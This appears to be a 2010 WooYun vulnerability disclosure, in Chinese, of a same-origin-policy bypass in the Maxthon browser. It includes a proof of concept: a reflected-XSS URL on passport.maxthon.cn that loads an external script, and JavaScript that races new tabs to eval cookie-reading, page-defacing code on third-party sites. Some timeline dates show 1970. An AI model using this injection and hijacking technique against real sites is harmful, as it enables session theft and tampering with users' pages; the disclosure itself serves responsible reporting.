当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2010-058

漏洞标题:遨游浏览器跨域脚本漏洞

相关厂商:傲游

漏洞作者: 结界师

提交时间:2010-07-21 23:18

修复时间:2010-08-21 00:00

公开时间:2010-08-21 00:00

漏洞类型:设计错误/逻辑缺陷

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2010-07-21: 细节已通知厂商并且等待厂商处理中
1970-01-01: 厂商已经确认,细节仅向厂商公开
1970-01-04: 细节向第三方安全合作伙伴开放
1970-02-25: 细节向核心白帽子及相关领域专家公开
1970-03-07: 细节向普通白帽子公开
1970-03-17: 细节向实习白帽子公开
2010-08-21: 细节向公众公开

简要描述:

傲游浏览器是符合中国人使用习惯的多标签浏览器,拥有业界最优秀的在线收藏和广告过滤功能 。遨游浏览器在架构设计上存在一个安全缺陷,同时结合自身接口函数的安全问题,可以突破浏览器同源策略,导致一个跨域脚本漏洞。

详细说明:

遨游浏览器一个external接口函数没有遵循同源策略,存在一个跨域脚本漏洞。
漏洞函数external.max_newTab(),函数的功能是打开一个新的标签页。该函数存在一个时间竞争条件错误,可以突破同源策略跨域操作窗口对象,跨域执行任意脚本。
同时遨游浏览器自定义开发的external接口函数设定了一个信任域,该信任域包括*.maxthon.cn等,结合*.maxthon.cn任意web应用的一个脚本漏洞就可以调用漏洞函数external.max_newTab()执行跨域操作。

漏洞证明:

POC:
1. passport.maxthon.cn存在一个跨站脚本漏洞,通过跨站脚本漏洞可以调用漏洞函数,嵌入一个远程的js http://127.0.0.1/vul.js
http://passport.maxthon.cn/new/register_account.html?account="><script/src=http://127.0.0.1/vul.js></script>
2.调用漏洞函数的javascript脚本

hijack_code = "alert(document.cookie);document.write('hacked by rayh4c#80sec.com')"
t1 = external.max_newTab("a",'http://www.sina.com/',"activate:yes")
t2 = external.max_newTab("b",'http://www.baidu.com/',"activate:yes")
t3 = external.max_newTab("a",'http://www.sohu.com/',"activate:yes")
setInterval("t1.eval(hijack_code)",1)
setInterval("t2.eval(hijack_code)",2)
setInterval("t3.eval(hijack_code)",3)


危害结果:
新打开的三个标签页窗口将随机命中一个窗口跨域注入脚本运行,如百度网页被读取COOKIE并篡改网页。

修复方案:

1.修复*.maxthon.cn域名内的WEB应用漏洞。
2.修复有漏洞的接口函数external.max_newTab()。

版权声明:转载请注明来源 结界师@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:12

确认时间:2010-07-21 23:18

厂商回复:

漏洞处理中.

最新状态:

2010-11-05:已修复